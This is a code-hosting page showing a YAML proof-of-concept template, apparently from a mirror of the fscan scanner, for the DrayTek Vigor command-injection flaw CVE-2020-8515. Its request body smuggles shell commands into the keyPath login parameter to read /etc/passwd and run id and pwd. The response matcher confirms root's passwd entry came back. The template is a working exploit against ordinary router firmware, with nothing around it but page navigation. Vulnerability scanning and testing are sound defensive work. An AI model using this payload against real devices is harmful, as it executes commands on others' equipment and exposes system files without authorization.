qwqdanchun
/
fscan
mirror of https://github.com/qwqdanchun/fscan.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
fscan/Web_Scan/pocs/draytek-cve-2020-8515.yml

16 lines
717 B
YAML
Raw Blame History

name: poc-yaml-draytek-cve-2020-8515
rules:
- method: POST
path: /cgi-bin/mainfunction.cgi
headers:
Content-Type: text/plain; charset=UTF-8
body: >-
action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2f/etc/passwd%26id%26pwd&loginUser=a&loginPwd=a
expression: >
response.status == 200 && response.body.bcontains(b"uid") && response.body.bcontains(b"gid") && "root:[x*]:0:0:".bmatches(response.body)
detail:
author: Soveless(https://github.com/Soveless)
Affected Version: "Vigor2960, Vigor300B, Vigor3900 < v1.5.1, VigorSwitch20P2121, VigorSwitch20G1280, VigorSwitch20P1280, VigorSwitch20G2280, VigorSwitch20P2280 <= v2.3.2"
links:
- https://github.com/imjdl/CVE-2020-8515-PoC
Reference in New Issue View Git Blame Copy Permalink